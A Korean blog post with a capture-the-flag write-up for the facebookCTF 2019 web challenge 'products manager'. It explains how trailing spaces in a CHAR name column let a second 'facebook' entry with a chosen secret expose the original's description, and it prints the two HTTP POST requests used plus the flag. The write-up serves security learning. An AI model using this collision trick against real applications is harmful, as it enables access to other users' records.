티스토리 뷰

해답/'3'

[WEB][facebookCTF2019] products manager

m3rg3ry 2019. 10. 28. 17:57

일본에 출장갔을 때 소장님께서 열심히 노트북을 보고 계시길래 갑자기 합류해서 푼 문제!

역시 함께하는 CTF가 제일제일 재밌다. 혼자하는건 좀.. 힘도 빠지고 뭔가 꼭 안풀어도 될꺼같고..

풀이

다운로드 한 파일은 소스파일임

db.php를 보면 products 테이블에 name이 char인 것을 확인할 수 있고 facebook의 description으로 flag가 있는걸 확인할 수 있음

 

add.php를 보면 name, secret, description의 내용이 빈것이 아니고 name이 같은 데이터가 없으면 INSERT를 함

  • secret은 숫자, 대문자, 소문자가 한개씩 포함한 10글자 이상의 문자열

  • prepare()와 bind_param()를 이용하기 때문에 SQLi X

 

view.php에서는 name과 secret이 맞으면 description을 보여주는데 secret은 sha256으로 해시되어 들어가기 떄문에 DB의 secret을 알아내도 평문을 알아내지 못함

name은 char로 저장됨

 

Exploit

# add.php

POST /add.php HTTP/1.1
Host: challenges.fbctf.com:8087
Content-Length: 48
Cache-Control: max-age=0
Origin: http://challenges.fbctf.com:8087
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Referer: http://challenges.fbctf.com:8087/add.php
Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: session=9638b92d-1490-467c-8228-9f599d1987d2
Connection: close


name=facebook+++&secret=1Aa1231231&description=1

 

# view.php

POST /view.php HTTP/1.1
Host: challenges.fbctf.com:8087
Content-Length: 31
Cache-Control: max-age=0
Origin: http://challenges.fbctf.com:8087
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Referer: http://challenges.fbctf.com:8087/view.php
Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: session=9638b92d-1490-467c-8228-9f599d1987d2
Connection: close


name=facebook&secret=1Aa1231231

 

fb{4774ck1n9_5q1_w17h0u7_1nj3c710n_15_4m421n9_:)}

저작자표시

'해답 > '3'' 카테고리의 다른 글

test  (0) 2023.07.28
test  (0) 2023.07.26
[Defcon2019] speedrun-003  (0) 2019.10.28
[WEB][SecurityFest2018] Screensavers  (0) 2019.10.28
[WEB][hack.lu CTF 2019] RPDG  (0) 2019.10.28
공유하기 링크
댓글
«   2025/05   »
1 2 3
4 5 6 7 8 9 10
11 12 13 14 15 16 17
18 19 20 21 22 23 24
25 26 27 28 29 30 31